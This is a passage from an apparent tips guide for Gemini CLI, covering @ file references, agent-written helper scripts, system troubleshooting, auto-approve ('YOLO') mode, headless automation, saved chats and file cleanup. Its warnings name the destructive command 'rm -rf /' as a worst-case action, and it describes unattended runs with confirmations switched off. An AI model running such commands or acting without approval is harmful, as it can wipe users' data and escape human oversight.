How this works: These capabilities are typically enabled via MCP integrations. Google’s Gemini CLI team has built (or is working on) connectors for Google Workspace. One approach is running a small MCP server that uses Google’s APIs (Docs API, Sheets API, etc.) to retrieve document content when given a URL or ID. When configured, you might have slash commands or tools like /read_google_doc or simply an auto-detection that sees a Google Docs link and invokes the appropriate tool to fetch it.

For example, in an Agent Factory podcast demo, the team used a Google Docs MCP to save a summary directly to a doc - which implies they could also read the doc’s content in the first place. In practice, you might do something like:

@https://docs.google.com/document/d/XYZ12345

Including a URL with @ (the context reference syntax) signals Gemini CLI to fetch that resource. With a Google Doc integration in place, the content of that document would be pulled in as if it were a local file. From there, the AI can summarize it, answer questions about it, or otherwise use it in the conversation.

Similarly, if you paste a Google Drive file link, a properly configured Drive tool could download or open that file (assuming permissions and API access are set up). Google Sheets could be made available via an MCP that runs queries or reads cell ranges, enabling you to ask things like “What’s the sum of the budget column in this Sheet [link]?” and have the AI calculate it.

Setting it up: As of this writing, the Google Workspace integrations may require some tinkering (obtaining API credentials, running an MCP server such as the one described by Kanshi Tanaike, etc.). Keep an eye on the official Gemini CLI repository and community forums for ready-to-use extensions - for example, an official Google Docs MCP might become available as a plugin/extension. If you’re eager, you can write one following guides on how to use Google APIs within an MCP server. It typically involves handling OAuth (which Gemini CLI supports for MCP servers) and then exposing tools like read_google_doc.

Usage tip: When you have these tools, using them can be as simple as providing the link in your prompt (the AI might automatically invoke the tool to fetch it) or using a slash command like /doc open <link>. Check /tools to see what commands are available - Gemini CLI lists all tools and custom commands there.

In summary, Gemini CLI can reach out beyond your local filesystem. Whether it’s Google Docs, Sheets, Drive, or other external content, you can pull data in by reference. This pro tip saves you from manual copy-paste and keeps the context flow natural - just refer to the document or dataset you need, and let the AI grab what’s needed. It makes Gemini CLI a true knowledge assistant for all the information you have access to, not just the files on your disk.

(Note: Accessing private documents of course requires the CLI to have the appropriate permissions. Always ensure any integration respects security and privacy. In corporate settings, setting up such integrations might involve additional auth steps.)

Tip 7: Reference Files and Images with `@` for Explicit Context

Quick use-case: Instead of describing a file’s content or an image verbally, just point Gemini CLI directly to it. Using the @ syntax, you can attach files, directories, or images into your prompt. This guarantees the AI sees exactly what’s in those files as context. For example:

Explain this code to me: @./src/main.js

This will include the contents of src/main.js in the prompt (up to Gemini’s context size limits), so the AI can read it and explain it.

This @ file reference is one of Gemini CLI’s most powerful features for developers. It eliminates ambiguity - you’re not asking the model to rely on memory or guesswork about the file, you’re literally handing it the file to read. You can use this for source code, text documents, logs, etc. Similarly, you can reference entire directories:

Refactor the code in @./utils/ to use async/await.

By appending a path that ends in a slash, Gemini CLI will recursively include files from that directory (within reason, respecting ignore files and size limits). This is great for multi-file refactors or analyses, as the AI can consider all relevant modules together.

Even more impressively, you can reference binary files like images in prompts. Gemini CLI (using the Gemini model’s multimodal capabilities) can understand images. For example:

Describe what you see in this screenshot: @./design/mockup.png

The image will be fed into the model, and the AI might respond with something like “This is a login page with a blue sign-in button and a header image.” You can imagine the uses: reviewing UI mockups, organizing photos (as we’ll see in a later tip), or extracting text from images (Gemini can do OCR as well).

A few notes on using @ references effectively:

File limits: Gemini 2.5 Pro has a huge context window (up to 1 million tokens), so you can include quite large files or many files. However, extremely large files might be truncated. If a file is enormous (say, hundreds of thousands of lines), consider summarizing it or breaking it into parts. Gemini CLI will warn you if a reference is too large or if it skipped something due to size.
Automatic ignoring: By default, Gemini CLI respects your .gitignore and .geminiignore files when pulling in directory context. So if you @./ a project root, it will not dump huge ignored folders (like node_modules) into the prompt. You can customize ignore patterns with .geminiignore similarly to how .gitignore works.
Explicit vs implicit context: Taylor Mullen (the creator of Gemini CLI) emphasizes using @ for explicit context injection rather than relying on the model’s memory or summarizing things yourself. It’s more precise and ensures the AI isn’t hallucinating content. Whenever possible, point the AI to the source of truth (code, config files, documentation) with @ references. This practice can significantly improve accuracy.
Chaining references: You can include multiple files in one prompt, like:

Compare @./foo.py and @./bar.py and tell me differences.

The CLI will include both files. Just be mindful of token limits; multiple large files might consume a lot of the context window.
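The directory-reference behavior in the notes above (walk the tree, skip ignored paths, skip oversized files) can be pictured with a short Python sketch. This is an illustration under simplifying assumptions, not Gemini CLI’s actual logic: collect_context is a hypothetical name, patterns are matched with fnmatch against each path component rather than with full .gitignore semantics, and the size cap is an arbitrary default.

```python
import fnmatch
from pathlib import Path


def collect_context(
    root: Path, ignore_patterns: list[str], max_bytes: int = 200_000
) -> dict[str, str]:
    """Map relative path -> file text for every non-ignored file under root."""
    context: dict[str, str] = {}
    for path in sorted(root.rglob("*")):
        if not path.is_file():
            continue
        relative = path.relative_to(root)
        # Simplification: ignore a file if ANY path component matches a pattern.
        if any(
            fnmatch.fnmatch(part, pattern)
            for part in relative.parts
            for pattern in ignore_patterns
        ):
            continue
        if path.stat().st_size > max_bytes:
            continue  # skip oversized files rather than truncating them
        context[relative.as_posix()] = path.read_text(
            encoding="utf-8", errors="replace"
        )
    return context
```

Calling it with patterns such as ["node_modules", "*.log"] keeps dependency folders and logs out of the result, which is the effect the ignore files have on an @ directory reference.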

Using @ is essentially how you feed knowledge into Gemini CLI on the fly. It turns the CLI into a multi-modal reader that can handle text and images. As a pro user, get into the habit of leveraging this - it’s often faster and more reliable than asking the AI something like “Open the file X and do Y” (which it may or may not do on its own). Instead, you explicitly give it X to work with.

Tip 8: On-the-Fly Tool Creation (Have Gemini Build Helpers)

Quick use-case: If a task at hand would benefit from a small script or utility, you can ask Gemini CLI to create that tool for you - right within your session. For example, you might say, “Write a Python script to parse all JSON files in this folder and extract the error fields.” Gemini can generate the script, which you can then execute via the CLI. In essence, you can dynamically extend the toolset as you go.

Gemini CLI is not limited to its pre-existing tools; it can use its coding abilities to fabricate new ones when needed. This often happens implicitly: if you ask for something complex, the AI might propose writing a temporary file (with code) and then running it. As a user, you can also guide this process explicitly:

Creating scripts: You can prompt Gemini to create a script or program in the language of your choice. It will likely use the write_file tool to create the file. For instance:

Generate a Node.js script that reads all '.log' files in the current directory and reports the number of lines in each.

Gemini CLI will draft the code, and with your approval, write it to a file (e.g. script.js). You can then run it by either using the ! shell command (e.g. !node script.js) or by asking Gemini CLI to execute it (the AI might automatically use run_shell_command to execute the script it just wrote, if it deems it part of the plan).

Temporary tools via MCP: In advanced scenarios, the AI might even suggest launching an MCP server for some specialized tasks. For example, if your prompt involves some heavy text processing that might be better done in Python, Gemini could generate a simple MCP server in Python and run it. While this is rarer, it demonstrates that the AI can set up a new “agent” on the fly. (One of the slides from the Gemini CLI team humorously referred to “MCP servers for everything, even one called LROwn” - suggesting you can have Gemini run an instance of itself or another model, though that’s more of a trick than a practical use!)

The key benefit here is automation. Instead of you manually stopping to write a helper script, you can let the AI do it as part of the flow. It’s like having an assistant who can create tools on-demand. This is especially useful for data transformation tasks, batch operations, or one-off computations that the built-in tools don’t directly provide.

Nuances and safety: When Gemini CLI writes code for a new tool, you should still review it before running. The /diff view (Gemini will show you the file diff before you approve writing it) is your chance to inspect the code. Make sure it does what you expect and does nothing malicious or destructive. The AI shouldn’t produce something harmful unless your prompt explicitly asks, but as with any AI-generated code, double-check the logic, especially for scripts that delete or modify lots of data.

Example scenario: Let’s say you have a CSV file and you want to filter it in a complex way. You ask Gemini CLI to do it, and it might say: “I will write a Python script to parse the CSV and apply the filter.” It then creates filter_data.py. After you approve and it runs, you get your result, and you might never need that script again. This ephemeral creation of tools is a pro move - it shows the AI effectively extending its capabilities autonomously.
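For a sense of scale, a throwaway helper like the filter_data.py mentioned above is often only a dozen lines. The sketch below is one hypothetical shape for it, not output from Gemini CLI: the function name filter_rows, the numeric threshold filter, and the column names in the usage note are all assumptions chosen for illustration.

```python
import csv
import io


def filter_rows(csv_text: str, column: str, minimum: float) -> str:
    """Return CSV text containing only rows where `column` >= minimum."""
    reader = csv.DictReader(io.StringIO(csv_text))
    if reader.fieldnames is None:
        return ""  # empty input: nothing to filter
    output = io.StringIO()
    writer = csv.DictWriter(
        output, fieldnames=reader.fieldnames, lineterminator="\n"
    )
    writer.writeheader()
    for row in reader:
        if float(row[column]) >= minimum:
            writer.writerow(row)
    return output.getvalue()
```

For instance, filter_rows("name,amount\na,5\nb,50\n", "amount", 10) keeps only the row for b. Reviewing a script this small in the diff before approving it takes seconds, which is what makes the create-and-discard workflow practical.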

Pro Tip: If you find the script useful beyond the immediate context, you can promote it into a permanent tool or command. For instance, if the AI generated a great log-processing script, you might later turn it into a custom slash command (Tip #2) for easy reuse. The combination of Gemini’s generative power and the extension hooks means your toolkit can continuously evolve as you use the CLI.

In summary, don’t restrict Gemini to what it comes with. Treat it as a junior developer who can whip up new programs or even mini-servers to help solve the problem. This approach embodies the agentic philosophy of Gemini CLI - it will figure out what tools it needs, even if it has to code them on the spot.

Tip 9: Use Gemini CLI for System Troubleshooting & Configuration

Quick use-case: You can run Gemini CLI outside of a code project to help with general system tasks - think of it as an intelligent assistant for your OS. For example, if your shell is misbehaving, you could open Gemini in your home directory and ask: “Fix my .bashrc file, it has an error.” Gemini can then open and edit your config file for you.

This tip highlights that Gemini CLI isn’t just for coding projects - it’s your AI helper for your whole development environment. Many users have used Gemini to customize their dev setup or fix issues on their machine:

Editing dotfiles: You can load your shell configuration (.bashrc or .zshrc) by referencing it (@~/.bashrc) and then ask Gemini CLI to optimize or troubleshoot it. For instance, “My PATH isn’t picking up Go binaries, can you edit my .bashrc to fix that?” The AI can insert the correct export line. It will show you the diff for confirmation before saving changes.
Diagnosing errors: If you encounter a cryptic error in your terminal or an application log, you can copy it and feed it to Gemini CLI. It will analyze the error message and often suggest steps to resolve it. This is similar to how one might use StackOverflow or Google, but with the AI directly examining your scenario. For example: “When I run npm install, I get an EACCES permission error - how do I fix this?” Gemini might detect it’s a permissions issue in node_modules and guide you to change directory ownership or use a proper node version manager.
Running outside a project: By default, if you run gemini in a directory without a .gemini context, it just means no project-specific context is loaded - but you can still use the CLI fully. This is great for ad-hoc tasks like system troubleshooting. You might not have any code files for it to consider, but you can still run shell commands through it or let it fetch web info. Essentially, you’re treating Gemini CLI as an AI-powered terminal that can do things for you, not just chat.
Workstation customization: Want to change a setting or install a new tool? You can ask Gemini CLI, “Install Docker on my system” or “Configure my Git to sign commits with GPG.” The CLI will attempt to execute the steps. It might fetch instructions from the web (using the search tool) and then run the appropriate shell commands. Of course, always watch what it’s doing and approve the commands - but it can save time by automating multi-step setup processes. One real example: a user asked Gemini CLI to “set my macOS Dock preferences to auto-hide and remove the delay,” and the AI was able to execute the necessary defaults write commands.

Think of this mode as using Gemini CLI as a smart shell. In fact, you can combine this with Tip 16 (shell passthrough mode) - sometimes you might drop into ! shell mode to verify something, then go back to AI mode to have it analyze output.

Caveat: When doing system-level tasks, be cautious with commands that have widespread impact (like rm -rf or system config changes). Gemini CLI will usually ask for confirmation, and it doesn’t run anything without you seeing it. But as a power user, you should have a sense of what changes are being made. If unsure, ask Gemini to explain a command before running (e.g., “Explain what defaults write com.apple.dock autohide-delay -float 0 does” - it will gladly explain rather than just execute if you prompt it in that way).

Troubleshooting bonus: Another neat use is using Gemini CLI to parse logs or config files looking for issues. For instance, “Scan this Apache config for mistakes” (with @httpd.conf), or “Look through syslog for errors around 2 PM yesterday” (with an @/var/log/syslog if accessible). It’s like having a co-administrator. It can even suggest likely causes for crashes or propose fixes for common error patterns.

In summary, don’t hesitate to fire up Gemini CLI as your assistant for environment issues. It’s there to accelerate all your workflows - not just writing code, but maintaining the system that you write code on. Many users report that customizing their dev environment with Gemini’s help feels like having a tech buddy always on call to handle the tedious or complex setup steps.

Tip 10: YOLO Mode - Auto-Approve Tool Actions (Use with Caution)

Quick use-case: If you’re feeling confident (or adventurous), you can let Gemini CLI run tool actions without asking for your confirmation each time. This is YOLO mode (You Only Live Once). It’s enabled by the --yolo flag or by pressing Ctrl+Y during a session. In YOLO mode, as soon as the AI decides on a tool (like running a shell command or writing to a file), it executes it immediately, without that “Approve? (y/n)” prompt.

Why use YOLO mode? Primarily for speed and convenience when you trust the AI’s actions. Experienced users might toggle YOLO on if they’re doing a lot of repetitive safe operations. For example, if you ask Gemini to generate 10 different files one after another, approving each can slow down the flow; YOLO mode would just let them all be written automatically. Another scenario is using Gemini CLI in a completely automated script or CI pipeline - you might run it headless with --yolo so it doesn’t pause for confirmation.

To start in YOLO mode from the get-go, launch the CLI with:

gemini --yolo

Or the short form gemini -y. You’ll see some indication in the CLI (like a different prompt or a notice) that auto-approve is on. During an interactive session, you can toggle it by pressing Ctrl+Y at any time - the CLI will usually display a message like “YOLO mode enabled (all actions auto-approved)” in the footer.

Big warning: YOLO mode is powerful but risky. The Gemini team itself labels it for “daring users” - meaning you should be aware that the AI could potentially execute a dangerous command without asking. In normal mode, if the AI decided to run rm -rf / (worst-case scenario), you’d obviously decline. In YOLO mode, that command would run immediately (and likely ruin your day). While such extreme mistakes are unlikely (the AI’s system prompt includes safety guidelines), the whole point of confirmations is to catch any unwanted action. YOLO removes that safety net.

Best practices for YOLO: If you want some of the convenience without full risk, consider allow-listing specific commands. For example, you can configure in settings that certain tools or command patterns don’t require confirmation (like allowing all git commands, or read-only actions). In fact, Gemini CLI supports a config for skipping confirmation on specific commands: e.g., you can set something like "tools.shell.autoApprove": ["git ", "npm test"] to always run those. This way, you might not need YOLO mode globally - you selectively YOLO only safe commands. Another approach: run Gemini in a sandbox or container when using YOLO, so even if it does something wild, your system is insulated (Gemini has a --sandbox flag to run tools in a Docker container).
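The selective approach above boils down to a prefix check with one important guard. The Python sketch below illustrates that idea only; it is not Gemini CLI’s matching logic, and is_auto_approved and SHELL_OPERATORS are hypothetical names. It assumes a command is safe to skip confirmation when it starts with an allow-listed command and contains no shell operators that could chain in something else.

```python
SHELL_OPERATORS = (";", "&&", "||", "|", "`", "$(", ">", "<")


def is_auto_approved(command: str, allowed_prefixes: list[str]) -> bool:
    """Return True only for allow-listed commands with no shell chaining."""
    stripped = command.strip()
    # Refuse anything that could smuggle a second command past the check.
    if any(operator in stripped for operator in SHELL_OPERATORS):
        return False
    for prefix in allowed_prefixes:
        base = prefix.strip()
        # Match the command itself or the command followed by arguments,
        # so "git" allows "git status" but not "gitk".
        if stripped == base or stripped.startswith(base + " "):
            return True
    return False
```

The operator guard matters because a bare prefix match would happily approve "git status && rm -rf /". Whatever mechanism you use for allow-listing, it is worth checking how it treats chained commands before trusting it.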

Many advanced users toggle YOLO on and off frequently - turning it on when doing a string of minor file edits or queries, and off when about to do something critical. You can do the same, using the keyboard shortcut as a quick toggle.

In summary, YOLO mode eliminates friction at the cost of oversight. It’s a pro feature to use sparingly and wisely. It truly demonstrates trust in the AI (or recklessness!). If you’re new to Gemini CLI, you should probably avoid YOLO until you clearly understand the patterns of what it tends to do. If you do use it, double down on having version control or backups - just in case.

(If it’s any consolation, you’re not alone - many in the community joke about “I YOLO’ed and Gemini did something crazy.” So use it, but… well, you only live once.)

Tip 11: Headless & Scripting Mode (Run Gemini CLI in the Background)

Quick use-case: You can use Gemini CLI in scripts or automation by running it in headless mode. This means you provide a prompt (or even a full conversation) via command-line arguments or environment variables, and Gemini CLI produces an output and exits. It’s great for integrating with other tools or triggering AI tasks on a schedule.

For instance, to get a one-off answer without opening the REPL, you can use gemini -p "...prompt...". This is already headless usage: it prints the model’s response and returns to the shell. But there’s more you can do:

System prompt override: If you want to run Gemini CLI with a custom system persona or instruction set (different from the default), you can use the environment variable GEMINI_SYSTEM_MD. By setting this, you tell Gemini CLI to ignore its built-in system prompt and use your provided file instead. For example:

export GEMINI_SYSTEM_MD="/path/to/custom_system.md"
gemini -p "Perform task X with high caution"

This would load your custom_system.md as the system prompt (the “role” and rules the AI follows) before executing the prompt. Alternatively, if you set GEMINI_SYSTEM_MD=true, the CLI will look for a file named system.md in the current project’s .gemini directory. This feature is very advanced - it essentially allows you to replace the built-in brain of the CLI with your own instructions, which some users do for specialized workflows (like simulating a specific persona or enforcing ultra-strict policies). Use it carefully, as replacing the core prompt can affect tool usage (the core prompt contains important directions for how the AI selects and uses tools).

Direct prompt via CLI: Aside from -p, there’s also -i (interactive prompt) which starts a session with an initial prompt, and then keeps it open. For example: gemini -i "Hello, let's debug something" will open the REPL and already have said hello to the model. This is useful if you want the first question to be asked immediately when starting.
Scripting with shell pipes: You can pipe not just text but also files or command outputs into Gemini. For example: gemini -p "Summarize this log:" < big_log.txt will feed the content of big_log.txt into the prompt (after the phrase “Summarize this log:”). Or you might do some_command | gemini -p "Given the above output, what went wrong?". This technique allows you to compose Unix tools with AI analysis. It’s headless in the sense that it’s a single-pass operation.
Running in CI/CD: You could incorporate Gemini CLI into build processes. For instance, a CI pipeline might run a test and then use Gemini CLI to automatically analyze failing test output and post a comment. Using the -p flag and environment auth, this can be scripted. (Of course, ensure the environment has the API key or auth needed.)
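When the caller is a program rather than a shell one-liner, the pieces above (the -p flag, piped input, GEMINI_SYSTEM_MD, and optionally --yolo) can be wrapped in a small helper. This is a minimal Python sketch, assuming the gemini executable is on PATH and already authenticated; build_command, build_env, and run_headless are hypothetical names, and the timeout is an arbitrary choice.

```python
import os
import subprocess
from typing import Optional


def build_command(prompt: str, auto_approve: bool = False) -> list[str]:
    """Assemble the argument list for a single headless run."""
    command = ["gemini", "-p", prompt]
    if auto_approve:
        command.append("--yolo")  # skips confirmations: use with care
    return command


def build_env(system_md: Optional[str] = None) -> dict[str, str]:
    """Copy the current environment, optionally overriding the system prompt."""
    env = dict(os.environ)
    if system_md is not None:
        env["GEMINI_SYSTEM_MD"] = system_md
    return env


def run_headless(
    prompt: str,
    stdin_text: Optional[str] = None,
    system_md: Optional[str] = None,
    auto_approve: bool = False,
    timeout: int = 300,
) -> str:
    """Run one prompt, feeding stdin_text like a shell pipe, and return stdout."""
    result = subprocess.run(
        build_command(prompt, auto_approve),
        input=stdin_text,
        env=build_env(system_md),
        capture_output=True,
        text=True,
        timeout=timeout,
        check=True,  # raise if the CLI exits with a non-zero status
    )
    return result.stdout
```

A CI step could then pass the failing test output as stdin_text with a prompt such as "Given the above output, what went wrong?" and post the returned text as a comment. Passing the arguments as a list avoids shell quoting problems with prompts that contain quotes.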

One more headless trick: the --output-format json flag (or the equivalent config setting). Gemini CLI can output responses in JSON format instead of human-readable text. This is useful for programmatic consumption - your script can parse the JSON to get the answer or the details of any tool actions.

Why headless mode matters: It transforms Gemini CLI from an interactive assistant into a backend service or utility that other programs can call. You could schedule a cronjob that runs a Gemini CLI prompt nightly (imagine generating a report or cleaning up something with AI logic). You could wire up a button in an IDE that triggers a headless Gemini run for a specific task.

Example: Let’s say you want a daily summary of a news website. You could have a script:

gemini -p "Web-fetch \"https://news.site/top-stories\" and extract the headlines, then write them to headlines.txt"

You would probably add --yolo so that it doesn’t ask for confirmation before writing the file. This would use the web fetch tool to get the page and the file write tool to save the headlines, all automatically, with no human in the loop. The possibilities are endless once you treat Gemini CLI as a scriptable component.

In summary, Headless Mode enables automation. It’s the bridge between Gemini CLI and other systems. Mastering it means you can scale up your AI usage - not just when you’re typing in the terminal, but even when you aren’t around, your AI agent can do work for you.

(Tip: For truly long-running non-interactive tasks, you might also look into Gemini CLI’s “Plan” mode or how it can generate multi-step plans without intervention. However, those are advanced topics beyond this scope. In most cases, a well-crafted single prompt via headless mode can achieve a lot.)

Tip 12: Save and Resume Chat Sessions

Quick use-case: If you’ve been debugging an issue with Gemini CLI for an hour and need to stop, you don’t have to lose the conversation context. Use /chat save to save the session. Later (even after restarting the CLI), you can use /chat resume to pick up where you left off. This way, long-running conversations can be paused and continued seamlessly.

Gemini CLI essentially has a built-in chat session manager. The commands to know are:

/chat save <tag> - Saves the current conversation state under a tag/name you provide. The tag is like a filename or key for that session. Save as often as you want; saving again under an existing tag overwrites it. (Using a descriptive name is helpful - e.g., /chat save fix-docker-issue.)
/chat list - Lists all your saved sessions (the tags you’ve used). This helps you remember what you named previous saves.
/chat resume <tag> - Resumes the session with that tag, restoring the entire conversation context and history to how it was when saved. It’s like you never left. You can then continue chatting from that point.
/chat share <file> - Saves the current conversation to a file. This is useful because you can share the entire chat with someone else, who can then continue the session - almost like collaboration.

Under the hood, these sessions are likely stored in ~/.gemini/chats/ or a similar location. They include the conversation messages and any relevant state. This feature is super useful for cases such as:

Long debugging sessions: Sometimes debugging with an AI can be a long back-and-forth. If you can’t solve it in one go, save it and come back later (maybe with a fresh mind). The AI will still “remember” everything from before, because the whole context is reloaded.
Multi-day tasks: If you’re using Gemini CLI as an assistant for a project, you might have one chat session for “Refactor module X” that spans multiple days. You can resume that specific chat each day so the context doesn’t reset daily. Meanwhile, you might have another session for “Write documentation” saved separately. Switching contexts is just a matter of saving one and resuming the other.
Team hand-off: This is more experimental, but in theory, you could share the content of a saved chat with a colleague (the saved files are likely portable). If they put it in their .gemini directory and resume, they could see the same context. The simpler, more practical approach for collaboration is to copy the relevant Q&A from the log and use a shared GEMINI.md or prompt, but it’s worth noting that the session data is yours to keep.

Usage example:

/chat save api-upgrade

(Session saved as “api-upgrade”)

/quit

(Later, reopen CLI)

$ gemini
gemini> /chat list

(Shows: api-upgrade)

gemini> /chat resume api-upgrade

The session now picks up with the state of the last exchange restored. You can confirm by scrolling up that all your previous messages are present.

Pro Tip: Use meaningful tags when saving chats. Instead of /chat save session1, give it a name related to the topic (e.g. /chat save memory-leak-bug). This will help you find the right one later via /chat list. There is no strict limit announced on how many sessions you can save, but cleaning up old ones occasionally might be wise just for organization.

This feature turns Gemini CLI into a persistent advisor. You don’t lose knowledge gained in a conversation; you can always pause and resume. It’s a differentiator compared to some other AI interfaces that forget context when closed. For power users, it means you can maintain parallel threads of work with the AI. Just like you’d have multiple terminal tabs for different tasks, you can have multiple chat sessions saved and resume the one you need at any given time.

Tip 13: Multi-Directory Workspace - One Gemini, Many Folders

Quick use-case: Do you have a project split across multiple repositories or directories? You can launch Gemini CLI with access to all of them at once, so it sees a unified workspace. For example, if your frontend and backend are separate folders, you can include both so that Gemini can edit or reference files in both.

There are two ways to use multi-directory mode:

Launch flag: Use the --include-directories (or -I) flag when starting Gemini CLI. For example:

gemini --include-directories "../backend,../frontend"

This assumes you run the command from, say, a scripts directory and want to include two sibling folders. You provide a comma-separated list of paths (the flag can also be repeated, once per directory). Gemini CLI will then treat all those directories as part of one big workspace.

Persistent setting: In your settings.json, you can define "includeDirectories": ["path1", "path2", ...] (see the cheat sheet at https://www.philschmid.de/gemini-cli-cheatsheet). This is useful if you always want certain common directories loaded (e.g., a shared library folder that multiple projects use). The paths can be relative or absolute. Home-directory shorthand in paths (like ~/common-utils) is also allowed.

When multi-dir mode is active, the CLI’s context and tools consider files across all included locations. The /directory show command will list which directories are in the current workspace. You can also dynamically add directories during a session with /directory add <path> (https://medium.com/@ferreradaniel/gemini-cli-free-ai-tool-upgrade-5-new-features-you-need-right-now-04cfefac5e93) - it will then load that directory on the fly (potentially scanning it for context like it does on startup).

Why use multi-directory mode? In microservice architectures or modular codebases, it’s common that one piece of code lives in one repo and another piece in a different repo. If you only ran Gemini in one, it wouldn’t “see” the others. By combining them, you enable cross-project reasoning. For example, you could ask, “Update the API client in the frontend to match the backend’s new API endpoints” - Gemini can open the backend folder to see the API definitions and simultaneously open the frontend code to modify it accordingly. Without multi-dir, you’d have to do one side at a time and manually carry info over.

Example: Let’s say you have client/ and server/. You start:

cd client
gemini --include-directories "../server"

Now at the gemini> prompt, if you do !ls, you’ll see it can list files in both client and server (it might show them as separate paths). You could do:

Open server/routes/api.py and client/src/api.js side by side to compare function names.

The AI will have access to both files. Or you might say:

The API changed: the endpoint "/users/create" is now "/users/register". Update both backend and frontend accordingly.

It can simultaneously create a patch in the backend route and adjust the frontend fetch call.

Under the hood, Gemini merges the file index of those directories. There might be some performance considerations if each directory is huge, but generally it handles multiple small-medium projects fine. The cheat sheet notes that this effectively creates one workspace with multiple roots.

Tip within a tip: Even if you don’t use multi-dir all the time, know that you can still reference files across the filesystem by absolute path in prompts (@/path/to/file). However, without multi-dir, Gemini might not have permission to edit those or know to load context from them proactively. Multi-dir formally includes them in scope so it’s aware of all files for tasks like search or code generation across the whole set.

Remove directories: If needed, /directory remove (or a similar command) can drop a directory from the workspace. This is less common, but maybe if you included something accidentally, you can remove it.

In summary, multi-directory mode unifies your context. It’s a must-have for polyrepo projects or any situation where code is split up. It makes Gemini CLI act more like an IDE that has your entire solution open. As a pro user, this means no part of your project is out of the AI’s reach.

Tip 14: Organize and Clean Up Your Files with AI Assistance

Quick use-case: Tired of a messy Downloads folder or disorganized project assets? You can enlist Gemini CLI to act as a smart organizer. By providing it an overview of a directory, it can classify files and even move them into subfolders (with your approval). For instance, “Clean up my Downloads: move images to an Images folder, PDFs to Documents, and delete temporary files.”

Because Gemini CLI can read file names, sizes, and even peek into file contents, it can make informed decisions about file organization. One community-created tool dubbed “Janitor AI” showcases this: it runs via Gemini CLI to categorize files as important vs junk, and groups them accordingly. The process involved scanning the directory, using Gemini’s reasoning on filenames and metadata (and content if needed), then moving files into categories. Notably, it didn’t automatically delete junk - rather, it moved them to a Trash folder for review.

Here’s how you might replicate such a workflow with Gemini CLI manually:

Survey the directory: Use a prompt to have Gemini list and categorize. For example:

List all files in the current directory and categorize them as "images", "videos", "documents", "archives", or "others".

Gemini might use !ls or similar to get the file list, then analyze the names/extensions to produce categories.

Plan the organization: Ask Gemini how it would like to reorganize. For example:

Propose a new folder structure for these files. I want to separate by type (Images, Videos, Documents, etc.). Also identify any files that seem like duplicates or unnecessary.

The AI might respond with a plan: e.g., “Create folders: Images/, Videos/, Documents/, Archives/. Move X.png, Y.jpg to Images/; move A.mp4 to Videos/; etc. The file temp.txt looks unnecessary (maybe a temp file).”

Execute moves with confirmation: You can then instruct it to carry out the plan. It may use shell commands like mv for each file. Since this modifies your filesystem, you’ll get confirmation prompts for each (unless you YOLO it). Carefully approve the moves. After completion, your directory will be neatly organized as suggested.

Throughout, Gemini’s natural language understanding is key. It can reason, for instance, that IMG_001.png is an image or that presentation.pdf is a document, even if not explicitly stated. It can even open an image (using its vision capability) to see what’s in it - e.g., differentiating between a screenshot vs a photo vs an icon - and name or sort it accordingly.

Renaming files by content: A particularly magical use is having Gemini rename files to be more descriptive. The Dev Community article “7 Insane Gemini CLI Tips” describes how Gemini can scan images and automatically rename them based on their content. For example, a file named IMG_1234.jpg might be renamed to login_screen.jpg if the AI sees it’s a screenshot of a login screen. To do this, you could prompt:

For each .png image here, look at its content and rename it to something descriptive.

Gemini will open each image (via vision tool), get a description, then propose a mv IMG_1234.png login_screen.png action. This can dramatically improve the organization of assets, especially in design or photo folders.

Two-pass approach: The Janitor AI discussion noted a two-step process: first broad categorization (important vs junk vs other), then refining groups. You can emulate this: first separate files that likely can be deleted (maybe large installer .dmg files or duplicates) from those to keep. Then focus on organizing the keepers. Always double-check what the AI flags as junk; its guess might not always be right, so manual oversight is needed.

Safety tip: When letting the AI loose on file moves or deletions, have backups or at least be ready to undo (with /restore or your own backup). It’s wise to do a dry-run: ask Gemini to print the commands it would run to organize, without executing them, so you can review. For instance: “List the mv and mkdir commands needed for this plan, but don’t execute them yet.” Once you have reviewed the list, you can either copy and paste the commands to run them yourself, or instruct Gemini to proceed.
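The same dry-run idea can be sketched outside of Gemini. The Python snippet below is only an illustration, not something Gemini CLI runs itself: the CATEGORIES map and the plan_moves helper are hypothetical names made up for this example. It builds the mkdir and mv commands as text so you can review them, and it never touches the filesystem.

```python
import shlex
from pathlib import Path

# Hypothetical extension-to-folder mapping; adjust to taste.
CATEGORIES = {
    ".png": "Images", ".jpg": "Images", ".jpeg": "Images",
    ".mp4": "Videos", ".mov": "Videos",
    ".pdf": "Documents", ".docx": "Documents",
    ".zip": "Archives", ".tar": "Archives",
}


def plan_moves(filenames):
    """Return the shell commands that would sort the files by type.

    Nothing is executed; the result is a list of strings to review.
    Files with unknown extensions are skipped and stay where they are.
    """
    commands = []
    folders_seen = set()
    for name in sorted(filenames):
        folder = CATEGORIES.get(Path(name).suffix.lower())
        if folder is None:
            continue  # unknown type: leave it for manual review
        if folder not in folders_seen:
            commands.append(f"mkdir -p {shlex.quote(folder)}")
            folders_seen.add(folder)
        # "--" stops option parsing, so odd names like "-x.png" are safe.
        commands.append(f"mv -- {shlex.quote(name)} {shlex.quote(folder + '/')}")
    return commands


if __name__ == "__main__":
    # Print the plan for the regular files in the current directory.
    files = [p.name for p in Path(".").iterdir() if p.is_file()]
    print("\n".join(plan_moves(files)))
```

Because the output is plain text, you can compare it with the plan Gemini proposes before approving anything.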

This is a prime example of using Gemini CLI for “non-obvious” tasks - it’s not just writing code, it’s doing system housekeeping with AI smarts. It can save time and bring a bit of order to chaos. After all, as developers we accumulate clutter (logs, old scripts, downloads), and an AI janitor can be quite handy.

Tip 15: Compress Long Conversations to Stay Within Context

Quick use-case: If you’ve been chatting with Gemini CLI for a long time, you might hit the model’s context length limit or just find the session getting unwieldy. Use the /compress command to summarize the conversation so far, replacing the full history with a concise summary. This frees up space for more discussion without starting from scratch.

Large language models have a fixed context window (Gemini 2.5 Pro’s is very large, but not infinite). If you exceed it, the model may start forgetting earlier messages or lose coherence. The /compress feature is essentially an AI-generated tl;dr of your session that keeps important points.

How it works: When you type /compress, Gemini CLI will take the entire conversation (except system context) and produce a summary. It then replaces the chat history with that summary as a single system or assistant message, preserving essential details but dropping minute-by-minute dialogue. It will indicate that compression happened. For example, after /compress, you might see something like:

--- Conversation compressed ---
Summary of discussion: The user and assistant have been debugging a memory leak in an application. Key points: The issue is likely in DataProcessor.js, where objects aren’t being freed. The assistant suggested adding logging and identified a possible infinite loop. The user is about to test a fix.
--- End of summary ---

From that point on, the model only has that summary (plus new messages) as context for what happened before. This usually is enough if the summary captured the salient info.

